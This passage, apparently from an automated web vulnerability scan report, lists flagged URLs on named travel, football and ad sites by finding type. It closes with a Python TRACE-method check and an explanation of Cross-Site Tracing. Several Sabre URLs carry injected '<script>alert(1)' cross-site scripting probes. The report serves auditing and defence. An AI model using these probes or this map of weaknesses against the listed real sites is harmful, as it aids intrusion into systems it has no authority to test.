15.17. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

15.18. http://www.manutd.com/en/One-United.aspx

15.19. http://www.turkishairlines.com/en-CA/index.aspx

15.20. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

16. Source code disclosure

16.1. http://travela.priceline.com/hotel/js/searchValidation.js

16.2. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/cmn/0025-en_us/display.pkg.js

16.3. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

16.4. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

16.5. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

16.6. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

16.7. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

16.8. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

16.9. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

16.10. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

16.11. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

16.12. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

16.13. http://www.hotels.com/bundles/enhanced_search-H36.0.2-128976.js

16.14. http://www.hotels.com/bundles/hcom-H36.0.2-128976.js

16.15. http://www.sabrehospitality.com/js/roundies.js

17. Referer-dependent response

17.1. http://d.tradex.openx.com/afr.php

17.2. http://delivery.hotels.com/Hotels/Delivery.aspx

17.3. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

17.4. http://goal.us.intellitxt.com/intellitxt/front.asp

17.5. http://www.facebook.com/plugins/like.php

17.6. http://www.hotels.com/html/blank.html

18. Cross-domain POST

18.1. http://www.aon.com/site/products-services.jsp

18.2. http://www.aon.com/site/search.jsp

18.3. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

18.4. http://www.guardian.co.uk/football/manchester-united

18.5. http://www.sabreairlinesolutions.com/home/

18.6. http://www.turkishairlines.com/en-CA/index.aspx

18.7. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.8. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.9. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.10. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.11. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19. Cross-domain Referer leakage

19.1. http://a.collective-media.net/cmadj/cm.guardian/

19.2. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

19.3. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

19.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

19.5. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

19.6. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

19.7. http://ad.doubleclick.net/adi/gna.en/level2

19.8. http://ad.doubleclick.net/adj/cm.guardian/

19.9. http://ad.doubleclick.net/adj/cm.guardian/

19.10. http://ad.doubleclick.net/adj/gna.en/level2

19.11. http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston

19.12. http://ad.turn.com/server/ads.js

19.13. http://ad.yieldmanager.com/iframe3

19.14. http://ad.yieldmanager.com/iframe3

19.15. http://ad.yieldmanager.com/iframe3

19.16. http://ad.yieldmanager.com/iframe3

19.17. http://ad.yieldmanager.com/iframe3

19.18. http://ad.yieldmanager.com/iframe3

19.19. http://ad.yieldmanager.com/iframe3

19.20. http://ad.yieldmanager.com/iframe3

19.21. http://ad.yieldmanager.com/iframe3

19.22. http://ad.yieldmanager.com/iframe3

19.23. http://ad.yieldmanager.com/iframe3

19.24. http://ad.yieldmanager.com/iframe3

19.25. http://ad.yieldmanager.com/iframe3

19.26. http://ad.yieldmanager.com/iframe3

19.27. http://ad.yieldmanager.com/iframe3

19.28. http://ad.yieldmanager.com/iframe3

19.29. http://ad.yieldmanager.com/iframe3

19.30. http://ad.yieldmanager.com/iframe3

19.31. http://ad.yieldmanager.com/iframe3

19.32. http://ad.yieldmanager.com/iframe3

19.33. http://ad.yieldmanager.com/iframe3

19.34. http://ad.yieldmanager.com/iframe3

19.35. http://ad.yieldmanager.com/iframe3

19.36. http://ad.yieldmanager.com/iframe3

19.37. http://ad.yieldmanager.com/iframe3

19.38. http://ad.yieldmanager.com/iframe3

19.39. http://ad.yieldmanager.com/iframe3

19.40. http://ad.yieldmanager.com/iframe3

19.41. http://ad.yieldmanager.com/iframe3

19.42. http://ad.yieldmanager.com/iframe3

19.43. http://ad.yieldmanager.com/iframe3

19.44. http://ad.yieldmanager.com/iframe3

19.45. http://ad.yieldmanager.com/iframe3

19.46. http://ad.yieldmanager.com/iframe3

19.47. http://ad.yieldmanager.com/iframe3

19.48. http://ad.yieldmanager.com/iframe3

19.49. http://ad.yieldmanager.com/iframe3

19.50. http://ad.yieldmanager.com/iframe3

19.51. http://ad.yieldmanager.com/iframe3

19.52. http://ad.yieldmanager.com/iframe3

19.53. http://ad.yieldmanager.com/iframe3

19.54. http://ad.yieldmanager.com/iframe3

19.55. http://ad.yieldmanager.com/iframe3

19.56. http://ad.yieldmanager.com/iframe3

19.57. http://ad.yieldmanager.com/iframe3

19.58. http://ad.yieldmanager.com/iframe3

19.59. http://ad.yieldmanager.com/iframe3

19.60. http://ad.yieldmanager.com/iframe3

19.61. http://ad.yieldmanager.com/iframe3

19.62. http://ad.yieldmanager.com/iframe3

19.63. http://ad.yieldmanager.com/iframe3

19.64. http://ad.yieldmanager.com/iframe3

19.65. http://ad.yieldmanager.com/iframe3

19.66. http://ad.yieldmanager.com/iframe3

19.67. http://ad.yieldmanager.com/iframe3

19.68. http://ad.yieldmanager.com/iframe3

19.69. http://ad.yieldmanager.com/iframe3

19.70. http://ad.yieldmanager.com/iframe3

19.71. http://ad.yieldmanager.com/iframe3

19.72. http://ad.yieldmanager.com/iframe3

19.73. http://ad.yieldmanager.com/iframe3

19.74. http://ad.yieldmanager.com/iframe3

19.75. http://ad.yieldmanager.com/iframe3

19.76. http://ad.yieldmanager.com/iframe3

19.77. http://ad.yieldmanager.com/iframe3

19.78. http://ad.yieldmanager.com/iframe3

19.79. http://ad.yieldmanager.com/iframe3

19.80. http://ad.yieldmanager.com/iframe3

19.81. http://ad.yieldmanager.com/iframe3

19.82. http://ad.yieldmanager.com/iframe3

19.83. http://ad.yieldmanager.com/iframe3

19.84. http://ad.yieldmanager.com/iframe3

19.85. http://ad.yieldmanager.com/iframe3

19.86. http://ad.yieldmanager.com/iframe3

19.87. http://ad.yieldmanager.com/imp

19.88. http://ad.yieldmanager.com/imp

19.89. http://ads.pointroll.com/PortalServe/

19.90. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

19.91. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

19.92. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

19.93. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

19.94. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

19.95. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

19.96. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

19.97. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH

19.98. http://afe.specificclick.net/

19.99. http://afe.specificclick.net/

19.100. http://as.chango.com/links/adunit/1.31759988192e+12

19.101. http://bh.contextweb.com/bh/rtset

19.102. http://bp.specificclick.net/

19.103. http://bp.specificclick.net/

19.104. http://cdn.flashtalking.com/container/4649/4649.js

19.105. http://clk.specificclick.net/click/v=5

19.106. http://cm.g.doubleclick.net/pixel

19.107. http://cm.g.doubleclick.net/pixel

19.108. http://cm.g.doubleclick.net/pixel

19.109. http://cm.g.doubleclick.net/pixel

19.110. http://cm.g.doubleclick.net/pixel

19.111. http://cm.g.doubleclick.net/pixel

19.112. http://cm.g.doubleclick.net/pixel

19.113. http://cm.g.doubleclick.net/pixel

19.114. http://cm.g.doubleclick.net/pixel

19.115. http://cms.ad.yieldmanager.net/v1/cms

19.116. http://d.tradex.openx.com/afr.php

19.117. http://d.tradex.openx.com/afr.php

19.118. http://d.tradex.openx.com/afr.php

19.119. http://delivery.hotels.com/Hotels/Delivery.aspx

19.120. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

19.121. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.122. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

19.123. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

19.124. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.125. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

19.126. http://fls.doubleclick.net/activityi

19.127. http://fls.doubleclick.net/activityi

19.128. http://fls.doubleclick.net/activityi

19.129. http://fls.doubleclick.net/activityi

19.130. http://fls.doubleclick.net/activityi

19.131. http://fls.doubleclick.net/activityi

19.132. http://fls.doubleclick.net/activityi

19.133. http://fls.doubleclick.net/activityi

19.134. http://fls.doubleclick.net/activityi

19.135. http://fls.doubleclick.net/activityi

19.136. http://fls.doubleclick.net/activityi

19.137. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

19.138. http://googleads.g.doubleclick.net/pagead/ads

19.139. http://googleads.g.doubleclick.net/pagead/ads

19.140. http://googleads.g.doubleclick.net/pagead/ads

19.141. http://googleads.g.doubleclick.net/pagead/ads

19.142. http://googleads.g.doubleclick.net/pagead/ads

19.143. http://googleads.g.doubleclick.net/pagead/ads

19.144. http://hublotnation.com/

19.145. http://ib.adnxs.com/ab

19.146. http://ib.adnxs.com/if

19.147. http://ib.adnxs.com/if

19.148. http://ib.adnxs.com/if

19.149. http://ib.adnxs.com/seg

19.150. http://ib.adnxs.com/ttj

19.151. http://int.teracent.net/tase/int

19.152. http://o-va1.wtp101.com/imp

19.153. http://o-va1.wtp101.com/imp

19.154. http://o-va3.wtp101.com/imp

19.155. http://o-va3.wtp101.com/imp

19.156. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

19.157. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

19.158. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

19.159. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.160. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.161. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

19.162. http://searchit.sabre.com/query.html

19.163. http://seg.sharethis.com/getSegment.php

19.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

19.165. http://static.igougo.com/scripts/all_53403.ashx

19.166. http://tag.admeld.com/id

19.167. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

19.168. http://travel.travelocity.com/hotel/HotelAvailability.do

19.169. http://travel.travelocity.com/hotel/HotelCobrand.do

19.170. http://travel.travelocity.com/hotel/HotelDetail.do

19.171. http://travela.priceline.com/hotel/newHotelSearch.do

19.172. http://travela.priceline.com/hotel/searchHotels.do

19.173. http://travela.priceline.com/hotel/searchResults.do

19.174. http://travela.priceline.com/hotel/searchResults.do

19.175. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx

19.176. http://www.aon.com/site/search.jsp

19.177. http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm

19.178. http://www.barclayswealth.com/international/i-alert.htm

19.179. http://www.booking.com/general.en-us.html

19.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html

19.181. http://www.booking.com/hotel/us/copley-square.en-us.html

19.182. http://www.booking.com/index.en-us.html

19.183. http://www.booking.com/searchresults.html

19.184. http://www.cheaptickets.com/shop/hotelsearch

19.185. http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

19.186. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

19.187. http://www.expedia.com/Hotel-Search

19.188. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

19.189. http://www.facebook.com/plugins/likebox.php

19.190. http://www.facebook.com/plugins/likebox.php

19.191. http://www.getaroom.com/washington-dc

19.192. http://www.goal.com/en/comment/comments-box

19.193. http://www.google.com/cse

19.194. http://www.google.com/search

19.195. http://www.google.com/search

19.196. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

19.197. http://www.hotelplanner.com/Search/Index.cfm

19.198. https://www.hotelplanner.com/Accept/Reserve.cfm

19.199. http://www.hotels.com/hotel/details.html

19.200. http://www.hotels.com/hotel/hoteldata.html

19.201. http://www.hotels.com/search.do

19.202. http://www.hotels.com/search/search.html

19.203. http://www.hotwire.com/hotel/details.jsp

19.204. http://www.hotwire.com/hotel/results.jsp

19.205. http://www.igougo.com/WebResource.axd

19.206. http://www.igougo.com/WebResource.axd

19.207. http://www.igougo.com/WebResource.axd

19.208. http://www.igougo.com/WebResource.axd

19.209. http://www.igougo.com/WebResource.axd

19.210. http://www.igougo.com/WebResource.axd

19.211. http://www.igougo.com/WebResource.axd

19.212. http://www.igougo.com/traveldeals/ratefinder.aspx

19.213. http://www.jscache.com/weimg

19.214. http://www.manutd.com/One-United/Login.aspx

19.215. http://www.manutd.com/Search-Results.aspx

19.216. http://www.manutd.com/en/Club/Sponsors.aspx

19.217. http://www.mufoundation.org/Search.aspx

19.218. http://www.nike.com/nikefootball/home/

19.219. http://www.nike.com/nikefootball/home/socialfeeds

19.220. http://www.nike.com/nikefootball/home/twitterfeed

19.221. http://www.orbitz.com/App/SubmitQuickSearch

19.222. http://www.orbitz.com/App/SubmitQuickSearch

19.223. http://www.orbitz.com/App/SubmitQuickSearch

19.224. http://www.orbitz.com/App/ViewFlightSearchResults

19.225. http://www.orbitz.com/shared/adserverProxy.jsp

19.226. http://www.orbitz.com/shared/adserverProxy.jsp

19.227. http://www.orbitz.com/shared/adserverProxy.jsp

19.228. http://www.orbitz.com/shared/adserverProxy.jsp

19.229. http://www.orbitz.com/shared/adserverProxy.jsp

19.230. http://www.orbitz.com/shared/adserverProxy.jsp

19.231. http://www.orbitz.com/shared/adserverProxy.jsp

19.232. http://www.orbitz.com/shared/adserverProxy.jsp

19.233. http://www.orbitz.com/shared/adserverProxy.jsp

19.234. http://www.orbitz.com/shared/adserverProxy.jsp

19.235. http://www.orbitz.com/shared/adserverProxy.jsp

19.236. http://www.orbitz.com/shared/adserverProxy.jsp

19.237. http://www.orbitz.com/shop/hotelsearch

19.238. http://www.orbitz.com/shop/hotelsearch

19.239. http://www.orbitz.com/shop/hotelsearch

19.240. http://www.premierleague.com/page/SearchResults/

19.241. http://www.sabrehospitality.com/

19.242. http://www.sabretravelnetwork.com/home/search/show_results

19.243. http://www.travelocity.com/popWindow2

19.244. http://www.trip.com/

19.245. http://www.trip.com/box_ad_refresh.html

19.246. http://www.tripadvisor.com/CheckMore

19.247. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.248. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.249. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

20.2. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

20.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

20.4. http://ad.doubleclick.net/adi/gna.en/level2

20.5. http://ad.yieldmanager.com/iframe3

20.6. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

20.7. http://as.chango.com/links/adunit/1.31759988192e+12

20.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

20.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

20.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

20.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

20.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

20.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

20.14. http://fls.doubleclick.net/activityi

20.15. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://googleads.g.doubleclick.net/pagead/ads

20.18. http://googleads.g.doubleclick.net/pagead/ads

20.19. http://hublotnation.com/

20.20. http://hublotnation.com/

20.21. http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

20.22. http://ib.adnxs.com/if

20.23. http://ib.adnxs.com/if

20.24. http://ib.adnxs.com/if

20.25. http://o-va1.wtp101.com/imp

20.26. http://o-va1.wtp101.com/imp

20.27. http://o-va3.wtp101.com/imp

20.28. http://o-va3.wtp101.com/imp

20.29. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

20.30. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

20.31. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

20.32. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

20.33. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.34. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.35. http://seg.sharethis.com/getSegment.php

20.36. http://static.igougo.com/scripts/all_53403.ashx

20.37. http://static.igougo.com/traveldeals/iAuto.aspx

20.38. http://travel.travelocity.com/hotel/HotelAvailability.do

20.39. http://travel.travelocity.com/hotel/HotelCobrand.do

20.40. http://travel.travelocity.com/hotel/HotelDetail.do

20.41. http://travela.priceline.com/hotel/newHotelSearch.do

20.42. http://travela.priceline.com/hotel/searchResults.do

20.43. http://www.aon.com/manchesterunited/

20.44. http://www.booking.com/general.en-us.html

20.45. http://www.booking.com/hotel/us/c-boston-massachusettes.html

20.46. http://www.booking.com/hotel/us/copley-square.en-us.html

20.47. http://www.booking.com/index.en-us.html

20.48. http://www.booking.com/searchresults.html

20.49. http://www.cheaptickets.com/shop/hotelsearch

20.50. http://www.cmegroup.com/advance/

20.51. http://www.facebook.com/plugins/likebox.php

20.52. http://www.facebook.com/plugins/likebox.php

20.53. http://www.getaroom.com/

20.54. http://www.goal.com/en/comment/comments-box

20.55. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

20.56. http://www.goal.com/en/teams/england/97/man-utd-news

20.57. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

20.58. http://www.guardian.co.uk/football/manchester-united

20.59. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

20.60. http://www.hotelplanner.com/Search/Index.cfm

20.61. https://www.hotelplanner.com/Accept/Reserve.cfm

20.62. http://www.hotels.com/hotel/details.html

20.63. http://www.hotels.com/search.do

20.64. http://www.hotels.com/search/search.html

20.65. http://www.hotwire.com/hotel/details.jsp

20.66. http://www.hotwire.com/hotel/results.jsp

20.67. http://www.igougo.com/WebResource.axd

20.68. http://www.igougo.com/WebResource.axd

20.69. http://www.igougo.com/WebResource.axd

20.70. http://www.igougo.com/WebResource.axd

20.71. http://www.igougo.com/WebResource.axd

20.72. http://www.igougo.com/WebResource.axd

20.73. http://www.igougo.com/WebResource.axd

20.74. http://www.igougo.com/about/

20.75. http://www.igougo.com/traveldeals/ratefinder.aspx

20.76. http://www.igougo.com/xd_receiver.aspx

20.77. http://www.manutd.com/

20.78. http://www.manutd.com/One-United/Login.aspx

20.79. http://www.manutd.com/Search-Results.aspx

20.80. http://www.manutd.com/Splash-Page.aspx

20.81. http://www.manutd.com/en.aspx

20.82. http://www.manutd.com/en/Club/Sponsors.aspx

20.83. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

20.84. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

20.85. http://www.manutd.com/en/One-United.aspx

20.86. http://www.orbitz.com/

20.87. http://www.orbitz.com/

20.88. http://www.orbitz.com/App/SubmitQuickSearch

20.89. http://www.orbitz.com/App/SubmitQuickSearch

20.90. http://www.orbitz.com/App/SubmitQuickSearch

20.91. http://www.orbitz.com/App/ViewFlightSearchResults

20.92. http://www.orbitz.com/shop/hotelsearch

20.93. http://www.orbitz.com/shop/hotelsearch

20.94. http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html

20.95. http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html

20.96. http://www.premierleague.com/page/Home

20.97. http://www.premierleague.com/page/Home/0,,12306,00.html

20.98. http://www.premierleague.com/page/Players/0,,12306,00.html

20.99. http://www.premierleague.com/page/SearchResults/

20.100. http://www.sabrehospitality.com/

20.101. http://www.sabrehospitality.com/hotel-distribution-systems.php

20.102. http://www.sabretravelnetwork.com/home

20.103. http://www.sabretravelnetwork.com/home/

20.104. http://www.sabretravelnetwork.com/home/products_services/product_index/

20.105. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

20.106. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

20.107. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

20.108. http://www.sabretravelnetwork.com/home/search/show_results

20.109. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

20.110. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

20.111. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

20.112. http://www.sabretravelnetwork.com/images/home-text.png

20.113. http://www.sabretravelnetwork.com/map.html

20.114. http://www.travelocity.com/

20.115. http://www.travelocity.com/472a

20.116. http://www.travelocity.com/popWindow2

20.117. http://www.trip.com/

20.118. http://www.trip.com/box_ad_refresh.html

20.119. http://www.trip.com/hotels.html

20.120. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

21. TRACE method is enabled

21.1. http://bcp.crwdcntrl.net/

21.2. http://bh.contextweb.com/

21.3. http://cacheserve.williamhill.com/

21.4. http://d.tradex.openx.com/

21.5. http://event.publishflow.com/

21.6. http://m.xp1.ru4.com/

21.7. http://matcher-cwb.bidder7.mookie1.com/

21.8. http://optimized-by.rubiconproject.com/

21.9. http://r.openx.net/

21.10. http://tap.rubiconproject.com/

21.11. http://www.guardian.co.uk/

21.12. http://www.luminate.com/
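
An added check for this finding (example code written for this page, not tooling from the report). TRACE echoes the request back, headers included, so a page that can get a TRACE response reflected into script (the Cross-Site Tracing technique published by Jeremiah Grossman in 2003) reads Cookie and Authorization values that HttpOnly and the same-origin policy are meant to keep from it. Browsers have since refused to issue TRACE from XMLHttpRequest and fetch, so on its own the finding is low severity and mostly signals an unhardened default (on Apache, TraceEnable off turns it off). The scanner's evidence is the echo itself, and the check below insists on it rather than on a bare 200, because many front ends answer any method with the home page. The marker header name is an assumption of the example; the sample replies are constructed, not captured from the hosts listed.

```python
import socket
import ssl
from urllib.parse import urlsplit

# Hypothetical header name: present only so the echo is unmistakably ours.
MARKER = "X-Xst-Probe"


def build_trace_request(host: str, path: str = "/") -> bytes:
    """Raw HTTP/1.1 TRACE request carrying the marker header."""
    return (
        f"TRACE {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"{MARKER}: 1\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def trace_enabled(raw_response: bytes) -> bool:
    """True only when the reply is a 200 whose message/http body echoes our request.

    RFC 7231 says a TRACE response carries the request as message/http, so the
    check requires the status, that content type, and the marker in the body.
    """
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        return False
    lines = head.split(b"\r\n")
    status = lines[0].split(b" ")
    if len(status) < 2 or status[1] != b"200":
        return False
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if not headers.get(b"content-type", b"").startswith(b"message/http"):
        return False
    return MARKER.lower().encode("ascii") in body.lower()


def probe(url: str, timeout: float = 5.0) -> bool:
    """Send the TRACE request to a live host and classify the reply (network; not run offline)."""
    parts = urlsplit(url)
    host = parts.hostname
    port = parts.port or (443 if parts.scheme == "https" else 80)
    sock = socket.create_connection((host, port), timeout=timeout)
    if parts.scheme == "https":
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    try:
        sock.sendall(build_trace_request(host, parts.path or "/"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    return trace_enabled(b"".join(chunks))


# Constructed sample replies; none was captured from a host in this report.
ECHOED = (
    b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n"
    b"TRACE / HTTP/1.1\r\nHost: example.test\r\nX-Xst-Probe: 1\r\n"
    b"Cookie: session=secret\r\nConnection: close\r\n\r\n"
)
REFUSED = b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n"
HOMEPAGE_200 = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>X-Xst-Probe</html>"

if __name__ == "__main__":
    for name, sample in (("echoed", ECHOED), ("refused", REFUSED), ("homepage", HOMEPAGE_200)):
        print(name, trace_enabled(sample))
```

The echoed Cookie line in the constructed sample is the whole point of the finding: whatever the client sent comes straight back in the body.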

22. Email addresses disclosed

22.1. http://a.cdn.intentmedia.net/javascripts/intent_media_cheaptickets_ads_fif.js

